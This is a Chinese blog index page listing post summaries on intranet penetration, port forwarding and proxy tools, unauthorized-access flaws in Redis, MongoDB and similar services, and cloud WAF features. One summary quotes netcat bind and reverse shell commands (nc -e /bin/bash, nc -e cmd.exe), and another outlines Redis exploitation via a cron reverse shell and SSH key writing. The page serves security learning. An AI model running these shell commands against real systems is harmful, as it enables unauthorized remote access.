bonelee - 博客园

2020年3月22日

摘要： 622. 设计循环队列难度中等89收藏分享切换为英文关注反馈设计你的循环队列实现。循环队列是一种线性数据结构，其操作表现基于 FIFO（先进先出）原则并且队尾被连接在队首之后以形成一个循环。它也被称为“环形缓冲器”。循环队列的一个好处是我们可以利用这个队列之前用过的空间。在一个普通队列里，一阅读全文

posted @ 2020-03-22 13:09 bonelee 阅读(508) 评论(0) 推荐(0)

2020年3月17日

使用ew完成多场景下内网代理穿透

摘要：使用ew完成多场景下内网代理穿透日期 2019-04-20 基础,内网渗透,代理穿透,端口转发作者 amm907 共0评论 0x01 需求当渗透进行到内网，常需要将流量代理到内网进行进一步扩展如：端口扫描端口转发访问内网web服务 …… 0x02 场景以下模拟一个使用场景。 1、环境配阅读全文

posted @ 2020-03-17 15:43 bonelee 阅读(3415) 评论(0) 推荐(0)

内网渗透中的端口转发——工具很全

摘要：内网渗透中的端口转发需要知道，在渗透的整个流程中，根据web应用或者开放的端口进行渗透，获取webshell只是渗透这门艺术的一小部分，在真实的错综复杂的企业环境中进行内网渗透，其实水很深，涉及内网穿透，端口转发，域渗透，提权等一系列的难题。所以这篇文章对内网渗透学习进行一些记录。在这过程中参考了阅读全文

posted @ 2020-03-17 15:34 bonelee 阅读(8361) 评论(0) 推荐(2)

内网渗透常见端口转发方式——lcx netsh rinetd warthworm regeorg msf portfwd sccat metasploit socks4a tunna

摘要：内网渗透常见端口转发方式 Feb 2, 2018 本篇文章主要是总结一下常见端口转发姿势。 0x01 前言网络拓扑 0x02 lcx lcx 参数端口映射 - 无法访问内网情况下端口转发 - 能够访问内网某台主机 0x03 netsh 说明安装IPV6 转发删除转发记录查看转发记录 0x 阅读全文

posted @ 2020-03-17 15:32 bonelee 阅读(1293) 评论(0) 推荐(0)

内网渗透代理——reGeorg 利用 webshell 建立一个 socks 代理进行内网穿透，本质上就是在webshell上做了一个代理转发而已

摘要：内网渗透之端口转发、映射、代理裁决 / 2019-09-18 09:22:14 / 浏览数 13714 渗透测试渗透测试顶(7) 踩(0) 端口转发&端口映射 0x01 什么是端口转发端口转发（Port forwarding），有时被叫做隧道，是安全壳（SSH）为网络安全通信使用的一种方法。端阅读全文

posted @ 2020-03-17 09:48 bonelee 阅读(4420) 评论(0) 推荐(0)

2020年3月16日

内网渗透代理——内网的防火墙只配置了入站规则比如只有80端口

摘要：内网渗透的边界场景分析+内网代理整理先从nc开始理解正向代理和反向代理： 1、正向连接受害者主机执行 nc -e -t /bin/bash -lvp 7777 攻击者执行 nc -t 192.168.16.X 7777 2、反向连接受害者主机执行 nc -t -e cmd.exe 192.16 阅读全文

posted @ 2020-03-16 22:34 bonelee 阅读(3684) 评论(0) 推荐(0)

2020年3月15日

web未授权访问漏洞总结——mongodb、redis、memcache、jboss、vnc、docker、zk、rsync

摘要：未授权访问漏洞总结 karlbrain 2019-07-27 共282627人围观，发现 1 个不明物体 WEB安全 *本文中涉及到的相关漏洞已报送厂商并得到修复，本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面阅读全文

posted @ 2020-03-15 21:13 bonelee 阅读(742) 评论(0) 推荐(0)

web未授权访问漏洞总结——非常全而细致 redis、mongodb、jenkins、zk、es、memcache、hadoop、couchdb、docker

摘要：未授权访问漏洞总结 2017年09月30日漏洞分析目录前言 0x01 介绍 0x02 Redis未授权访问 2.1 漏洞描述 2.2 漏洞利用 1、利用计划任务执行命令反弹shell 2、写 ssh-keygen 公钥登录服务器 3、获取 web 服务的 webshell 2.3 漏洞加固 0 阅读全文

posted @ 2020-03-15 21:10 bonelee 阅读(1718) 评论(0) 推荐(0)

阿里云 waf功能

摘要：功能名称描述 Web攻击防护抵御各类Web应用攻击，如SQL注入、命令执行、XSS等。 CC安全防护独家算法防护引擎、结合大数据、秒级拦截机器恶意CC攻击。精准访问控制（黑白名单）针对性地拦截或放行某次访问。高频Web攻击IP自动封禁自动封禁在短时间内进行多次Web攻击的客户端IP。阅读全文

posted @ 2020-03-15 20:58 bonelee 阅读(1038) 评论(0) 推荐(0)

阿里云防止网站敏感信息（个人的如身份证号手机号、服务器的如版本信息、他人的信息如越权查看）泄漏——通过规则匹配做避免身份证、银行卡、电话号码等敏感数据泄露；针对服务器返回的异常页面或关键字做信息保护。

摘要：防敏感信息泄漏是Web应用防火墙针对网安法提出的“网络运营者应当采取技术措施和其他必要措施，确保其收集的个人信息安全，防止信息泄露、毁损、丢失。在发生或者可能发生个人信息泄露、毁损、丢失的情况时，应当立即采取补救措施，按照规定及时告知用户并向有关主管部门报告”所给出的安全防护方案。前提条件说明阅读全文

posted @ 2020-03-15 20:56 bonelee 阅读(1340) 评论(1) 推荐(0)

将者，智、信、仁、勇、严也。

Hi，我是李智华，华为-安全AI算法专家，欢迎来到安全攻防对抗的有趣世界。

公告